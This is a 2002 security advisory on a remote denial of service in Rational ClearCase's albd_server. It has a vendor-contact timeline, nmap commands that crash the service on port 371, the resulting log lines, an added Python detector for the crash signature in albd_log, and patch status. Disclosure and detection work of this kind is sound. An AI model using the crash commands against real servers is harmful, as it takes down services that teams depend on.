Guardeonic Solutions AG (

Security Advisory #03-2002

Advisory Name: ClearCase remote DoS
Release Date: 11/22/02
Affected Product: Rational (R) ClearCase (R)
Platform: Solaris 2.5.1 and 8 for sure, others unknown
Version: 4.1 (patches 27, 28) and 2002.05 (patches 9, 10) for
sure, others unknown

Severity: The ClearCase process listening on TCP port 371
can be crashed by performing a simple nmap scan

Author: Stefan Bagdohn <>
Marek Rouchal <>

Vendor Communication:

09/24/02 Initial Notification via email to
09/24/02 Got vendor receipt via email, this is a known bug since
         07/31/02. From vendor's email: "We have fixed this issue
         for the next ClearCase version. A patch is actually under
         test for fixing this problem in all ClearCase version
         starting 4.1 The patch is planned to be released in the
         november
10/15/02 Rational sent three hotfixes (5.0/SUN, 4.1/SUN, 4.2/Redhat)
10/24/02 We tested the patches: The hotfix for ClearCase
         2002.05/Solaris Sparc works ok. The hotfix for ClearCase
         4.1/Solaris Sparc DOES NOT WORK, i.e. albd_server
         terminates after a port scan. Email was sent to vendor
         asking to fix it by 10/31 (this year)
10/28/02 Mail from vendor, asking for the exact patchlevel of the
         server (and the order of patches applied)
10/29/02 Provided Rational with the information
11/03/02 Mail to vendor, because there are no patches available yet!
11/04/02 Answer from Rational: Will be delivered mid-November
         (11/14, 11/15 or 11/18)
11/18/02 Rational provides the patch bundle
11/21/02 Tested the patch with the following result: ClearCase
         4.1/Solaris Sparc crashes as seen before.
         We are no longer willing to hold back this advisory as it
         is A) a serious bug and B) perhaps an indicator that
         Rational is 1) not willing to fix the bug or 2) not able
         to do so. However, it is not acceptable.


(From vendor's website): ... Rational(R) ClearCase(R), a robust software
artifact management tool. (end of vendor citation)

ClearCase is a version control, workspace management, build
management and process configuration tool. In short: it can do anything
but make coffee.

The service can easily be crashed by performing a simple TCP port scan
via nmap.


We have seen two different behaviours:

A) When performing a port scan of the target system with nmap, TCP port
371 is shown as open. When a second scan is started right after the first
one has finished, the port is reported open again, but the process crashes.

B) A second test, scanning only one port, crashes the service with
a single scan.


A) Executing

    nmap -vvv -O -sT ip.of.clearcase.system

two times will lead to the following message in the logs of
the ClearCase system (/var/adm/atria/log/albd_log):

    09/24/02 14:55:23 albd_server(7677): Error: Operation "accept"
        failed: Software caused connection abort.
    09/24/02 14:55:23 albd_server(7677): Ok: Exiting, status = 0

The service is no longer available afterwards.

B) By executing

    nmap -vvv -O -sT -p 371 ip.of.clearcase.system

one time, the service crashed immediately. (Note: nmap cannot
even finish its OS detection.)

Nmap version used was 3.00 on a Linux system.
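
Added example (not part of the original advisory and not Rational tooling): a Python check that scans albd_log for the signature quoted above, an "accept" failure followed by an exit of the same albd_server PID. The line layout is inferred from the two log lines in this advisory; the 5-second window, the function name and the sample input are assumptions.

```python
import re
from datetime import datetime, timedelta

# Layout inferred from the two albd_log lines quoted in the advisory:
#   MM/DD/YY HH:MM:SS albd_server(PID): Level: message
LINE = re.compile(
    r'^(\d\d/\d\d/\d\d \d\d:\d\d:\d\d) albd_server\((\d+)\): (\w+): (.*)$')
ACCEPT_FAIL = re.compile(r'Operation "accept"\s+failed: (.*)')


def find_accept_crashes(lines, window=timedelta(seconds=5)):
    """Return (timestamp, pid, reason) for each albd_server exit that follows
    an accept failure logged by the same PID within `window` (assumed value)."""
    entries = []
    for raw in lines:
        m = LINE.match(raw.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%m/%d/%y %H:%M:%S")
            entries.append([ts, int(m.group(2)), m.group(3), m.group(4)])
        elif entries and raw.strip():
            # A message may continue on an unstamped line, as in the excerpt.
            entries[-1][3] += " " + raw.strip()

    pending = {}   # pid -> (time of accept failure, reason text)
    crashes = []
    for ts, pid, level, msg in entries:
        fail = ACCEPT_FAIL.search(msg)
        if level == "Error" and fail:
            pending[pid] = (ts, fail.group(1))
        elif "Exiting" in msg and pid in pending:
            failed_at, reason = pending.pop(pid)
            if ts - failed_at <= window:
                crashes.append((ts, pid, reason))
    return crashes


# Constructed sample: the advisory's log lines plus one invented benign entry.
SAMPLE = """\
09/24/02 14:50:01 albd_server(7677): Ok: Constructed benign entry
09/24/02 14:55:23 albd_server(7677): Error: Operation "accept"
failed: Software caused connection abort.
09/24/02 14:55:23 albd_server(7677): Ok: Exiting, status = 0
""".splitlines()

if __name__ == "__main__":
    for ts, pid, reason in find_accept_crashes(SAMPLE):
        print(f"{ts:%m/%d/%y %H:%M:%S} albd_server({pid}) exited after accept failure: {reason}")
```

A hit means albd_server has already exited and has to be restarted; on unpatched 4.1 systems the check only shortens the time to notice the outage.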


Working patches for ClearCase 2002.05/Solaris Sparc available
from Rational since Nov-14-2002 (clearcase_p2002.05.00-12 and
Solution for 4.1: none!